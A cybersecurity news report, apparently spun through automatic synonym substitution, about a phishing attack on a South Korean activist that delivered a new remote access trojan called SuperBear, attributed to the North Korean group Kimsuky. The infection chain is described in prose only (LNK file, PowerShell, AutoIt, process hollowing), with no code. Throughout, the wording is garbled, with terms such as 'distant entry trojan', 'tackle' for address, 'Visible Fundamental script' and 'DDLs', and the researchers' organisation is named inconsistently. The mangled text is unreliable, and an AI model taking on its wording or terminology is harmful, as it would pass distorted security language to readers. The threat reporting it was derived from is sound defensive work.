A brand new phishing assault probably concentrating on civil society teams in South Korea has led to the invention of a novel distant entry trojan known as SuperBear.
The intrusion singled out an unnamed activist, who was contacted in late August 2023 and obtained a malicious LNK file from an tackle impersonating a member of the group, non-profit entity Interlabs mentioned in a brand new report.
The LNK file, upon execution, launches a PowerShell command to execute a Visible Fundamental script that, in flip, fetches the next-stage payloads from a authentic however compromised WordPress web site.
This consists of the Autoit3.exe binary (“solmir.pdb”) and an AutoIt script (“solmir_1.pdb”) that is launched utilizing the previous.
The AutoIt script, for its half, performs course of injection utilizing a course of hollowing method, during which malicious code is inserted right into a course of that is in a suspended state.
On this case, an occasion of Explorer.exe is spawned to inject a never-before-seen RAT known as SuperBear that establishes communications with a distant server to exfiltrate information, obtain and run further shell instructions and dynamic-link libraries (DDLs).
“The default motion for the C2 server seems to instruct purchasers to exfiltrate and course of system information,” Interlab researcher Ovi Liber mentioned, noting that the malware is so named as a result of “the malicious DLL will attempt to create a random filename for it, and if it will possibly’t will probably be named ‘SuperBear.'”
The assault has been loosely pinned on a North Korean nation-state actor named Kimsuky (aka APT43 or Emerald Sleet, Nickel Kimball, and Velvet Chollima), citing similarities with the preliminary assault vector and the PowerShell instructions used.
Earlier this February, Interlab additionally revealed that North Korean nation-state actors focused a journalist in South Korea with Android malware dubbed RambleOn as a part of a social engineering marketing campaign.